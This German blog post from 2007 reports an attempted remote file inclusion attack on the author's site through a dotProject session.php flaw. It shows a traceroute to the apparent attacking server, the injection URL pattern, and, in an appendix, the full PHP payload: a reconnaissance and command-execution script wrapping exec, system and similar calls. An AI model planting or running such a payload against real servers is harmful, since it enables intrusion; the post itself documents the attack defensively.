Sonntag, 12. August 2007

Sicherheit

Angriff auf den Blog verübt

Eben habe ich festgestellt, dass ein Cracker-Angriff auf den Entwickler Blog verübt wurde.

Der Versuch

Es wurde heute gegen 14:00 Uhr von einem, warscheinlich gekapertem Server, versucht auf dem System der Interpräsenz einzudringen.

Angriff via Plesk

Der Angriff sollte sich gegen ein (nicht) installiertes Dotproject richten. Da sich auf diesem System kein Dotproject befindet, ist der Angriff wohl etwas ziellos gewählt.

Die Server, von welchem der Angriff ausging, ist wohl über das kürzlich bekannt gewordene Lücke in der Administrations-Software Plesk eingedrungen. Via Traceroute habe ich dann ausmachen können, das der Server bei dem Anbieter Axarnet.es steht.

...
 6     9 ms     9 ms     9 ms  so-7-1.car1.Munich1.Level3.net [212.162.47.105]

 7    14 ms    15 ms    17 ms  ae-4-4.ebr1.Frankfurt1.Level3.net [4.69.134.2]
 8    15 ms    15 ms    15 ms  ae-11-53.car1.Frankfurt1.Level3.net [4.68.118.79

 9    15 ms    15 ms    15 ms  ge-2-1-2.fra40.ip.tiscali.net [4.68.127.2]
10    41 ms    41 ms    41 ms  so-0-0-0.mad40.ip.tiscali.net [213.200.81.22]
11    42 ms    41 ms    41 ms  91.142.***.***
12    41 ms    41 ms    41 ms  91.142.***.***

Die Lücke, welche Ausgenutzt werden sollte, ist in der Datei session.php - ein vollständiger Advisory auf Security Focus - wie auch beim Confixx Exploit liegt es an einer nicht initalisierten Variablen, diesmal die Variable: $baseDir.

/includes/session.php?baseDir=[REMOTE INCLUDE]

Einbinden der Fremdatei

Es wurde versucht eine Datei mit folgendem Inhalt einzubinden, welche man im Anhang sehen kann.

Wie man dort sehen kann, soll das Script zum Aufruf von Systemfunktionen benutzt werden. Da sich aber auf dem System keine Dotproject Installation befindet, ist der Angriff ins Leere gelaufen.

Anhang

Download Code!

  1.  
  2. <?
  3. echo "ALBANIA<br>";
  4. $alb = @php_uname();
  5. $alb2 = system(uptime);
  6. $alb3 = system(id);
  7. $alb4 = @getcwd();
  8. $alb5 = getenv("SERVER_SOFTWARE");
  9. $alb6 = phpversion();
  10. $alb7 = $_SERVER['SERVER_NAME'];
  11. $alb8 = $_SERVER['SERVER_ADDR'];
  12. $os = @PHP_OS;
  13. echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
  14. echo "os: $os<br>";
  15. echo "uname -a: $alb<br>";
  16. echo "uptime: $alb2<br>";
  17. echo "id: $alb3<br>";
  18. echo "pwd: $alb4<br>";
  19. echo "SoftWare: $alb5<br>";
  20. echo "PHPV: $alb6<br>";
  21. echo "ServerName: $alb7<br>";
  22. echo "ServerAddr: $alb8<br>";
  23. $free = disk_free_space($alb4);
  24. if ($free === FALSE) {$free = 0;}
  25. if ($free < 0) {$free = 0;}
  26. echo "Free: ".view_size($free)."<br>";
  27. $cmd="id";
  28. $eseguicmd=ex($cmd);
  29. echo $eseguicmd;
  30. function ex($cfe){
  31. $res = '';
  32. if (!empty($cfe)){
  33. if(function_exists('exec')){
  34. @exec($cfe,$res);
  35. $res = join("\n",$res);
  36. }
  37. elseif(function_exists('shell_exec')){
  38. $res = @shell_exec($cfe);
  39. }
  40. elseif(function_exists('system')){
  42. @system($cfe);
  43. $res = @ob_get_contents();
  45. }
  46. elseif(function_exists('passthru')){
  48. @passthru($cfe);
  49. $res = @ob_get_contents();
  51. }
  52. elseif(@is_resource($f = @popen($cfe,"r"))){
  53. $res = "";
  54. while(!@feof($f)) { $res .= @fread($f,1024); }
  55. @pclose($f);
  56. }}
  57. return $res;
  58. }
  59. function view_size($size)
  60. {
  61.  if (!is_numeric($size)) {return FALSE;}
  62.  else
  63.  {
  64.   if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  65.   elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  66.   elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  67.   else {$size = $size . " B";}
  68.   return $size;
  69.  }
  70. }
  72. ?>
  73.  
  74.  
Bewertung: keine, 0 Stimme(n) 2093 Klicks
Von Mr.Foo in Sicherheit am 12.08.07@15:19 Uhr

Trackbacks
Trackback für spezifische URI dieses Eintrags

Keine Trackbacks

3 Kommentare
Ansicht der Kommentare: (Linear | Verschachtelt)

Stargazer - #1 - 24.07.2008 16:53 - (Antwort)

Boah sind die Angriffe alt :-)
Hageln heute noch in Massen mit dem selben Text bei mir runter...

Mr. Foo - #1.1 - 29.07.2008 17:37 - (Antwort)

Ph34r M3 - I'm a script kiddy ^^

Stargazer - #1.1.1 - 29.07.2008 18:40 - (Antwort)

Ach ja - kleines Update: es gibt zu dem Angriff noch 'ne Lustigere PHP, die sogar ein paar Executeables mitbringt.

Nebenbei bemerkt sind diese Kiddies echte optimisten, wenn man bedenkt, dass die meisten Leute Remote-Includes deaktiviert haben...


Kommentar schreiben

Umschließende Sterne heben ein Wort hervor (*wort*), per _wort_ kann ein Wort unterstrichen werden.
Standard-Text Smilies wie :-) und ;-) werden zu Bildern konvertiert.
Die angegebene E-Mail-Adresse wird nicht dargestellt, sondern nur für eventuelle Benachrichtigungen verwendet.
Sie können [geshi lang=LANG][/lang] Tags verwenden um Quellcode abhängig von der gewählten Programmiersprache einzubinden